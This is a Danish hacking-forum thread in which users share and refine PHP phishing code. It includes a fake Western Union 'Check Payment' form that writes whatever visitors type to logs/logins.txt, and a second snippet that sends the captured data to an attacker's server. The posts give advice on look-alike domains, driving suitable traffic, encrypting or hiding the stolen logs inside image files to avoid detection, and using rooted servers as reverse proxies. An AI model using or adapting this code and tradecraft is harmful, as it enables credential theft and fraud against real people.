Denne kode kan tilpasses af dig til det som du gerne vil stjæle logins fra

Du kunne foreksempel tilpasse den til at stjæle credentials/oplysninger rettet mod der hvor der gerne vil have oplysninger til.
Har undladet at nævne foreksempler fordi de var for destructive, men skriv en PB og vi udveksler PGP.

Jeg brugte det meget og tilpassede det efter mit behov da jeg skrev koden.
Hvis man læser efter forstår man hvorfor jeg skrev det og hvad jeg skrev det til for at give jer en ekstra idea.

Hvis du har et godt domain eller kan skaffe det som ligner der hvor du vil have logins til så du kan bruge servicen.
Skaf menneske traffik som egner sig til dit mål.

Denne metode er gamle men stadig den effektiveste hvis man gør det rigtigt.
Hjælper gerne med at sætte det op og hjælpe med at tilpasse det til dit formål.  

Her er min kode:

<?php

if(isset($_POST['submit'])){

set_time_limit(0);

$textarea = $_POST['wu'];



    if($textarea == null){

        echo "Textarea is empty. Insert data to be verified.";

    }





    foreach(explode("\n", $_POST['wu']) as $line) {

        $line = strtolower($line);

            file_put_contents('./logs/logins.txt', $line . PHP_EOL, FILE_APPEND | LOCK_EX); // Skriver data  til logins.txt i folderen /logs/

}



}else{



echo ' // formen som vi stjæler information fra!

<form method="post">

<textarea name="wu" style="width:100%;resize:horizontal;" placeholder="western union:' . PHP_EOL. 'Input your WU mtcn here to verify that your payment has been sent!">

</textarea>

<input name="submit" type="submit" value="Check Payment ">

</fieldset>

</form>

    ';

}

?>

Har selv leget med det utroligt mange gange, til sider som bruger andet end MD5 til hashing af blandt andet passwords.
Det kan gøres mere stealth, da det ikke kræver mere end ganske få linjer at gemme form data.
Så skal man lige tage højde for at finde et dir der har de rigtige rettigheder, og måske endda bruge PHP indbyggede funktioner til at kryptere dataene før de gemmes. Det resulterer dog i lidt ekstra linjer, og hermed mindre stealth. Det kommer jo til at koste lidt plads, hvis man skal til at avnede noget asymmetrisk kryptering, da koden ellers let kan findes, og dataene kan reverses.
Jeg kan huske at jeg endte op med, bare at sende dataene direkte til min egen server. På den måde krævede det ikke andet end en GET/POST forsendelse, og alt andet blev håndteret på min egen server.

(25-03-2016, 10:30)______________________________ Skrev: Hele get_string_between funktionen bliver ikke brugt og er bare det første resultat fra stackoverflow.

Der er brugt 4 CSS classes, som ingen funktion har. fa, fa-hashtag og fa-3x er fra font-awsome, så den skal loades før at der sker noget. Desuden er det bare et stort #, så jeg aner ikke hvorfor fontawesome er brugt. Indentation er også lidt fucked. Og så er det bogstaveligt talt bare et script der gemmer noget $_POST data i en fil.

Nu er det ikke for at være ond, men man må godt arbejde lidt på det man lægger op.

Først og fremmeste, kig på hvornår jeg smed den ud.
Den tager da også data fra formen så jeg besluttede at give det et mere fangende navn.
Jeg fik glemt at fjerne noget af det theme som jeg brugte, da jeg kopierede min kode fra min server.

Koden er beregnet til at de skriver flere brugernavne og passwords for at se om de eksempelvis virker.
Jeg brugte koden til at stjæle formdataen fra cardere som gerne vil tjekke deres WU logins.

Du kan jo nok også sige dig selv som du nævnte at det var CSS, så hvordan kunne du ikke forstå at der nok har været et theme/tema med indenover?

Jo men get_string_between var brugt til lige hurtigt at give mig en hjælpende hånd.
Du er ikke ond, du er bare lidt skid for at udtale dig om ting som er rimelige gennemskuelige.

Jeg gjorde jo også opmærksomhed på at man skulle tilpasse det så det passer og for din nydelse tog jeg da get_string_between ud af koden.

---

(25-03-2016, 11:55)MalcolmXI Skrev: Har selv leget med det utroligt mange gange, til sider som bruger andet end MD5 til hashing af blandt andet passwords.
Det kan gøres mere stealth, da det ikke kræver mere end ganske få linjer at gemme form data.
Så skal man lige tage højde for at finde et dir der har de rigtige rettigheder, og måske endda bruge PHP indbyggede funktioner til at kryptere dataene før de gemmes. Det resulterer dog i lidt ekstra linjer, og hermed mindre stealth. Det kommer jo til at koste lidt plads, hvis man skal til at avnede noget asymmetrisk kryptering, da koden ellers let kan findes, og dataene kan reverses.
Jeg kan huske at jeg endte op med, bare at sende dataene direkte til min egen server. På den måde krævede det ikke andet end en GET/POST forsendelse, og alt andet blev håndteret på min egen server.

Filen bliver jo også skrevet til sig selv inde i sin mappe... Det kan da regelt være lige meget om en anden side har noget kryptering da du gerne vil have plain data som er brugbart?
Hvis gerne man vil sende data'en til sin anden egen server så er det jo noget lignende:

header('Access-Control-Allow-Orgin:*');

if (isset($_GET['wu']))

{

    $file = ("dump.txt");

    $f = fopen($file, 'a');

    fwrite($f, $_GET['wu'] . PHP_EOL);

}

?>

Så bliver dataen fra formen sendt til: http://localhost/dump.php?wu=
Som så videreskriver det til i en nice format i dump.txt

Du skal så også lige skrive resten af koden.. det var bare et eksempel.

Jeg tror du misforstod mig.
Det jeg mener er, at du ved selv at kryptere dataene, gør det en kende sværere for andre at se, hvad logfilens indhold går ud på.
Hvis en mindre kompetent webmaster opdager en fil med plaintext brugernavne og passwords, vil han nok undre sig, slette filen, og muligvis lede efter en forklaring.
Hvis han ser en fil med ulæselige data, er der større chance for, at han lader det være, grundet hans manglende viden.
Crawlers vil jo altid have en chance for at opdage fil-typer og navne såsom '/logs/logins.txt', og du vil vel ikke dele de opsnappede data med andre. Jeg ved godt det bare er et eksempel.
En habil webmaster vil dog altid være skeptisk over selv krypteret data, så det er her jeg foreslår folk at sende form-dataene direkte til en ekstern server. Så vil disse data heller ikke være mistet, i tilfælde af, at angrebet bliver opdaget.
Alternativt kunne man appende de (u)krypterede til en allerede eksisterende billede-fil på serveren, som herefter ikke vækker mistanke, og er let at hente ned til eksfiltrering.
Det jeg mente med rettighederne var, at det ikke er alle angreb der betyder, at du har skriverettigheder i webserverens mappe. Du kan jo godt komme ud for, at du har mulighed for at redigere eksisterede PHP-filer, men ikke rettigheder til at oprette nye filer.
Det er ikke for at nedgøre dit arbejde overhovedet, det er bare for at give lidt ekstra information. Om folk så kan bruge det eller ej, det er vel op til dem selv.

(25-03-2016, 20:00)MalcolmXI Skrev: Jeg tror du misforstod mig.
Det jeg mener er, at du ved selv at kryptere dataene, gør det en kende sværere for andre at se, hvad logfilens indhold går ud på.
Hvis en mindre kompetent webmaster opdager en fil med plaintext brugernavne og passwords, vil han nok undre sig, slette filen, og muligvis lede efter en forklaring.
Hvis han ser en fil med ulæselige data, er der større chance for, at han lader det være, grundet hans manglende viden.
Crawlers vil jo altid have en chance for at opdage fil-typer og navne såsom '/logs/logins.txt', og du vil vel ikke dele de opsnappede data med andre. Jeg ved godt det bare er et eksempel.
En habil webmaster vil dog altid være skeptisk over selv krypteret data, så det er her jeg foreslår folk at sende form-dataene direkte til en ekstern server. Så vil disse data heller ikke være mistet, i tilfælde af, at angrebet bliver opdaget.
Alternativt kunne man appende de (u)krypterede til en allerede eksisterende billede-fil på serveren, som herefter ikke vækker mistanke, og er let at hente ned til eksfiltrering.
Det jeg mente med rettighederne var, at det ikke er alle angreb der betyder, at du har skriverettigheder i webserverens mappe. Du kan jo godt komme ud for, at du har mulighed for at redigere eksisterede PHP-filer, men ikke rettigheder til at oprette nye filer.
Det er ikke for at nedgøre dit arbejde overhovedet, det er bare for at give lidt ekstra information. Om folk så kan bruge det eller ej, det er vel op til dem selv.

Jo var vågen hele natten og faldt først i søvn en time efter mit indlæg (hvilket nok også forklare en del).
Nu forstår jeg hvad du mener, men som sagt kan crawlers sagtens stoppes med nogle forskellige metoder men for en sikkerheds skyld overføre jeg også helt dataen til en ekstern server i brasilien.
Jeg bruger nu helst mine egne servere og et købt domain istedet for en shell og så bruger jeg mine eskalerede roots som reverse proxies for mine sidere, da jeg modtager 15-20k traffik på mine små sider og de store modtager 60-70k traffik og det er unik menneske traffik som er egnet til de oplysninger som jeg gerne vil høste fra dem.

Men det var jo også bare en hurtig eksempel kode og folk kan jo tilpasse koden som de lyster, det er det rare ved opensource og bestemt det ville da være rart at vide for dem som eventuelt tager koden i brug.
Hjælper dem også gerne med at tilpasse koden og det er jo også let at få det hele til at se bedre ud med noget CSS (som enhver nybegynder snildt kan sætte sig ind i).

Og der er en del klasser til PHP mod crawlers som forhindre dem i at crawle.
Jeg bruger eksempelvis APC anticrawler i alle min sider :)

(26-03-2016, 11:42)BigJ Skrev: Hvad i alverden, skulle APC Anticrawler virke imod en side, hvis du kun har ÉN PHP side, som man ofte har. Derudover, så hjælper det jo ikke med at beskytte txt filer, når du skal inklude det på hver side og kører det. - Antager det er denne class - https://sourceforge.net/projects/apcanti...p_redirect

Derudover, så burde dit eksempel evt. bare loop igennem $_POST, sådan, at der er mindre arbejde at lave, evt. smid det ind i json format, så er det jo også nemmere at holde styr på.

EDIT: Men fint nok skrevet, kunne bare være rart at se lidt mere kode, og gerne mere struktureret.

<?php

if(isset($_POST['submit'])) {

   set_time_limit(0);



   $textarea = $_POST['wu'];



   //Hvorfor ikke bare bruge empty, nok mere sigende end null

   if($textarea == null) {

       echo "Textarea is empty. Insert data to be verified.";

   }



   //Assigned til $textarea, men ikke brugt her, why?

   foreach(explode("\n", $_POST['wu']) as $line) {

       $line = strtolower($line);

       file_put_contents('./logs/logins.txt', $line . PHP_EOL, FILE_APPEND | LOCK_EX); // Skriver data  til logins.txt i folderen /logs/

   }



} else {

   // formen som vi stjæler information fra!

   echo '<form method="post">

   <textarea name="wu" style="width:100%;resize:horizontal;" placeholder="western union:' . PHP_EOL. 'Input your WU mtcn here to verify that your payment has been sent!">

   </textarea>

   <input name="submit" type="submit" value="Check Payment ">

   </fieldset>

   </form>';

}

?>

PS: Brug spaces i stedet for tabs, når du skriver kode herinde.

Jeg har forklaret at min side som jeg bruger sender data til en ekstern server. Den sender det via et AJAX request.
Koden var bare lige en hurtig fix løsning og det er jo din egen preference i længden og så kan du jo være uenig i det eller ej.
Koden er let at aflæse for enhver hvilket var meningen, så jeg synse den er fin nok.

APC hjælper på siden som du har inkluderet APC class i og det er også derfor jeg smider formdata over på en anden server.